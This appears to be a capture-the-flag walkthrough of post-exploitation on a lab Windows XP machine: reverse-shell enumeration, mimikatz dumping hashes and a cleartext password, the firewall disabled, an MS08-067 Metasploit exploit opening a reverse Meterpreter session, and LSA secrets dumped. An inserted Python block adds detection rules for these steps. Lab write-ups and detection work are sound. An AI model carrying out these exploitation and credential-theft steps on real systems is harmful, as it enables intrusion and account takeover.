04/05/2020 02:05 AM 73 shell.pl
04/05/2020 01:51 AM 5 Test.txt
04/05/2020 03:53 AM 224 TinyWebRCE.pl
04/05/2020 04:04 AM 156 TinyWebRCE2.pl
04/05/2020 04:09 AM 133 TinyWebRCE3.pl
04/05/2020 04:12 AM 133 TinyWebRCE4.pl
<snip>
hostname
Scream
cmd
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\www\root\cgi-bin>whoami
c:\www\root\cgi-bin>net user
User accounts for \\SCREAM
-------------------------------------------------------------------------------
Administrator alex Guest
HelpAssistant SUPPORT_388945a0
The command completed successfully.
C:\www\root\cgi-bin>qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
>console alex 0 Active wdcon
c:\www\root\cgi-bin>net user alex
User name alex
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/3/2020 11:35 PM
Password expires 5/16/2020 10:23 PM
Password changeable 4/3/2020 11:35 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/5/2020 3:02 AM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
C:\www\root\cgi-bin>cd C:\
C:\>tasklist /v
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ====== ================ ======== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Console 0 16 K Running NT AUTHORITY\SYSTEM 1:56:42 N/A
System 4 Console 0 536 K Running NT AUTHORITY\SYSTEM 0:00:11 N/A
smss.exe 512 Console 0 372 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 576 Console 0 3,492 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
winlogon.exe 600 Console 0 5,652 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 644 Console 0 3,088 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
lsass.exe 656 Console 0 1,328 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 812 Console 0 4,512 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 892 Console 0 3,960 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 988 Console 0 17,140 K Running NT AUTHORITY\SYSTEM 0:00:03 N/A
svchost.exe 1044 Console 0 3,300 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1148 Console 0 4,152 K Running NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
avgchsvx.exe 1256 Console 0 792 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
avgrsx.exe 1264 Console 0 644 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
spoolsv.exe 1476 Console 0 4,252 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
avgcsrvx.exe 1504 Console 0 13,684 K Running NT AUTHORITY\SYSTEM 0:00:01 N/A
explorer.exe 1616 Console 0 12,552 K Running SCREAM\alex 0:00:00 N/A
avgtray.exe 1832 Console 0 9,316 K Running SCREAM\alex 0:00:00 N/A
FileZilla Server Interfac 1912 Console 0 3,740 K Running SCREAM\alex 0:00:00 FileZilla Server
TINY.EXE 1976 Console 0 3,316 K Running SCREAM\alex 0:00:00 N/A
avgwdsvc.exe 460 Console 0 2,056 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
FileZilla server.exe 488 Console 0 2,760 K Running NT AUTHORITY\SYSTEM 0:00:00 CAsyncSocketEx Helper Window
FreeSSHDService.exe 532 Console 0 4,304 K Running NT AUTHORITY\SYSTEM 0:00:00 FreeSSHDService
OpenTFTPServerMT.exe 116 Console 0 1,800 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
alg.exe 2240 Console 0 3,332 K Running NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
wscntfy.exe 2664 Console 0 1,848 K Running SCREAM\alex 0:00:00 N/A
wpabaln.exe 4040 Console 0 2,800 K Running SCREAM\alex 0:00:00 N/A
logon.scr 1056 Console 0 1,540 K Running SCREAM\alex 0:00:00 N/A
perl.exe 2940 Console 0 7,148 K Running SCREAM\alex 0:00:00 C:\strawberry\perl\bin\perl.exe
perl.exe 2964 Console 0 7,148 K Running SCREAM\alex 0:00:00 C:\strawberry\perl\bin\perl.exe
perl.exe 2560 Console 0 7,340 K Running SCREAM\alex 0:00:00 C:\strawberry\perl\bin\perl.exe - tasklist /v
ntvdm.exe 3560 Console 0 1,952 K Running SCREAM\alex 0:00:00 N/A
cmd.exe 3160 Console 0 2,600 K Running SCREAM\alex 0:00:00 N/A
tasklist.exe 4060 Console 0 4,292 K Running SCREAM\alex 0:00:00 OleMainThreadWndName
wmiprvse.exe 1948 Console 0 5,484 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
C:\>dir "C:\Program Files"
Volume in drive C has no label.
Volume Serial Number is 8080-53D6
Directory of C:\Program Files
04/03/2020 11:37 PM <DIR> .
04/03/2020 11:37 PM <DIR> ..
04/03/2020 11:36 PM <DIR> AVG
04/03/2020 11:33 PM <DIR> Common Files
04/03/2020 11:33 PM <DIR> ComPlus Applications
02/08/2013 11:31 PM <DIR> FileZilla Server
04/03/2020 11:36 PM <DIR> freeSSHd
04/03/2020 11:33 PM <DIR> Internet Explorer
04/03/2020 11:33 PM <DIR> Messenger
04/03/2020 11:34 PM <DIR> microsoft frontpage
04/03/2020 11:33 PM <DIR> Movie Maker
04/03/2020 11:33 PM <DIR> MSN
04/03/2020 11:33 PM <DIR> MSN Gaming Zone
04/03/2020 11:33 PM <DIR> NetMeeting
04/03/2020 11:35 PM <DIR> Online Services
04/03/2020 11:36 PM <DIR> OpenTFTPServer
04/03/2020 11:33 PM <DIR> Outlook Express
04/03/2020 11:34 PM <DIR> Windows Media Player
04/03/2020 11:33 PM <DIR> Windows NT
04/03/2020 11:34 PM <DIR> xerox
0 File(s) 0 bytes
20 Dir(s) 6,923,341,824 bytes free
-----------------------
=> I downloaded the latest version of mimikatz from "http://blog.gentilkiwi.com/mimikatz" and uploaded it using the TFTP server
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> binary
tftp> put mimikatz.exe
Sent 1001224 bytes in 6.9 seconds
----------------------
=> Since I am logged in as 'alex', who is an administrator, I can elevate to SYSTEM using mimikatz's command "token::elevate";
then I dumped the password hashes stored in the SAM registry hive using mimikatz's command "lsadump::sam";
finally, I dumped the clear-text password of the current user 'alex' from memory (lsass) using mimikatz's command "sekurlsa::logonpasswords"
C:\www\root>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.2.0 (x86) #18362 Mar 8 2020 18:30:11
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
600 {0;000003e7} 0 - 23535 NT AUTHORITY\SYSTEM S-1-5-18 (03g,24p) Primary
-> Impersonated !
* Process Token : {0;000088d8} 0 - 10191035 SCREAM\alex S-1-5-21-602162358-507921405-854245398-1003 (08g,20p) Primary
* Thread Token : {0;000003e7} 0 - 10210010 NT AUTHORITY\SYSTEM S-1-5-18 (03g,24p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : SCREAM
SysKey : dfb6fe206786961793171f744aa18a28
Local SID : S-1-5-21-602162358-507921405-854245398
SAMKey : e93605754f745d400120bf02fbf900de
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : HelpAssistant
Hash LM : a03299a993da915ca9d82696d8625873
Hash NTLM: a8976221dea345e51ba030ddebc945b1
RID : 000003ea (1002)
User : SUPPORT_388945a0
Hash NTLM: 198b84b154680454ed6c56614542bf0e
RID : 000003eb (1003)
User : alex
Hash NTLM: 504182f8417ed8557b67e96adc8b4d04
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 35032 (00000000:000088d8)
Session : Interactive from 0
User Name : alex
Domain : SCREAM
Logon Server : SCREAM
Logon Time : 4/5/2020 3:02:09 AM
SID : S-1-5-21-602162358-507921405-854245398-1003
msv :
[00000002] Primary
* Username : alex
* Domain : SCREAM
* NTLM : 504182f8417ed8557b67e96adc8b4d04
* SHA1 : c84389be8e78f275c4530b00ba54aea1cbd347f7
wdigest :
* Username : alex
* Domain : SCREAM
* Password : thisisaverylongpassword
kerberos :
* Username : alex
* Domain : SCREAM
* Password : thisisaverylongpassword
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 4/5/2020 3:02:08 AM
SID : S-1-5-19
msv :
wdigest :
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : NETWORK SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 4/5/2020 3:02:08 AM
SID : S-1-5-20
msv :
[00000002] Primary
* Username : SCREAM$
* Domain : WORKGROUP
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
wdigest :
* Username : SCREAM$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : SCREAM$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 26069 (00000000:000065d5)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 4/5/2020 3:02:08 AM
SID :
msv :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SCREAM$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 4/5/2020 3:02:08 AM
SID : S-1-5-18
msv :
wdigest :
kerberos :
* Username : scream$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
mimikatz #
mimikatz # exit
Bye!
================== Other option to dump the clear-text password of the 'alex' account from memory ====================
=> Since our Perl reverse shell is running with local admin privileges (user 'alex'), I disabled the firewall and ran a known exploit (ms08067, ms17010) against this old Windows (XP) machine
to get a remote shell as SYSTEM. Finally, I dumped the passwords using Metasploit modules (e.g. hashdump and mimikatz)...
C:\Program Files>netsh firewall set opmode mode=DISABLE
netsh firewall set opmode mode=DISABLE
Ok.
=> Ports 445 and 139 are now open... :-)
jeff@kali-Linux:~$ nmap 192.168.1.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 06:43 CEST
Nmap scan report for 192.168.1.4
Host is up (0.085s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
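From the defender's side, the two host-level actions in the step above (the firewall switched off with `netsh`, and a credential-dumping tool launched from the web root it was uploaded to) are both visible in process-creation telemetry. The following is an added example, not part of the original writeup: it runs a few triage rules over constructed Sysmon/4688-style event records. The field names (`Image`, `CommandLine`, `ParentImage`, `User`), the sample events and the list of writable drop directories are assumptions made for this illustration; the `mimikatz` module names come from the writeup itself.

```python
"""Triage process-creation events for the host-side actions this writeup shows:
the Windows firewall being switched off with netsh, a tool executed from a
directory the TFTP/web server can write to, and mimikatz-style module names
passed on a command line.

Added example, not from the original writeup.  Event records are constructed;
field names and DROP_DIRS are assumptions for this illustration.
"""
import re
from typing import Dict, List

# Assumption: directories an unauthenticated service (here the TFTP server used
# to upload mimikatz) can write to and that the web server serves from.
DROP_DIRS = ["c:\\www\\root\\"]

RULES = {
    # XP-era "netsh firewall" and the later "netsh advfirewall" syntax
    "firewall_disabled": re.compile(
        r"(?:^|\s)netsh(?:\.exe)?\s+"
        r"(?:firewall\s+set\s+opmode\s+.*disable|advfirewall\s+set\s+\w+\s+state\s+off)",
        re.IGNORECASE),
    # mimikatz modules used in the writeup, when they appear on a command line
    "credential_dump_cli": re.compile(
        r"(?:privilege::debug|token::elevate|sekurlsa::|lsadump::)", re.IGNORECASE),
}

# Constructed sample events (not captured from the target).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\WINDOWS\system32\netsh.exe",
     "CommandLine": "netsh firewall set opmode mode=DISABLE",
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe", "User": r"SCREAM\alex"},
    {"Image": r"C:\WINDOWS\system32\netsh.exe",
     "CommandLine": "netsh firewall show state",          # benign query
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe", "User": r"SCREAM\alex"},
    {"Image": r"C:\www\root\mimikatz.exe",
     "CommandLine": "mimikatz.exe",                        # interactive use, as in the writeup
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe", "User": r"SCREAM\alex"},
    {"Image": r"C:\Temp\mk.exe",
     "CommandLine": 'mk.exe "privilege::debug" "sekurlsa::logonpasswords" exit',
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe", "User": r"SCREAM\alex"},
    {"Image": r"C:\WINDOWS\system32\tasklist.exe",
     "CommandLine": "tasklist /v",                         # noisy but not alerted on
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe", "User": r"SCREAM\alex"},
]


def triage_event(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list = no alert)."""
    hits = []
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "").lower()
    for name, pattern in RULES.items():
        if pattern.search(cmd):
            hits.append(name)
    # Image path check is separate from the command-line rules: a renamed
    # binary still has to live somewhere, and the drop directory is the tell.
    if any(image.startswith(d) for d in DROP_DIRS):
        hits.append("exec_from_drop_dir")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run every rule over a list of events and collect the alerts in order."""
    alerts = []
    for idx, ev in enumerate(events):
        hits = triage_event(ev)
        if hits:
            alerts.append({"index": idx, "user": ev.get("User"),
                           "image": ev.get("Image"), "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The firewall rule is deliberately specific to the "set ... disable/off" forms so that read-only `netsh firewall show` queries do not page anyone; the drop-directory rule catches the renamed-binary case that the command-line rule misses.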
msf5 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.1.34:4444
[*] 192.168.1.4:445 - Automatically detecting the target...
[*] 192.168.1.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.4:1079) at 2020-04-05 06:56:45 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeUndockPrivilege
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alex:1003:aad3b435b51404eeaad3b435b51404ee:504182f8417ed8557b67e96adc8b4d04:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a03299a993da915ca9d82696d8625873:a8976221dea345e51ba030ddebc945b1:::
pentester:1004:1e99d771a164613ab6cb882f20962373:fe4b8e9e7da90982005360caf7a5be78:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:198b84b154680454ed6c56614542bf0e:::
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/lsa_secrets
msf5 post(windows/gather/lsa_secrets) > set session 1
session => 1
msf5 post(windows/gather/lsa_secrets) > options
Module options (post/windows/gather/lsa_secrets):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
msf5 post(windows/gather/lsa_secrets) > run
[*] Executing module against SCREAM
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] XP or below system
[+] Key: 0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantAccount
Decrypted Value: S_#4EkzDiiDIpk
[+] Key: 0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantSID
Decrypted Value: D#CF2
[+] Key: DPAPI_SYSTEM
Decrypted Value: '#T`c$f.2UP
[+] Key: G${ED8F4747-E13D-47bc-856B-5CEFE1A81A7F}
Decrypted Value: .QOEz
[+] Key: L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75
Decrypted Value: RSA2H?LV&",V@MfWx}YQK'e`sm##.k;+Y/0+FX9.|>?z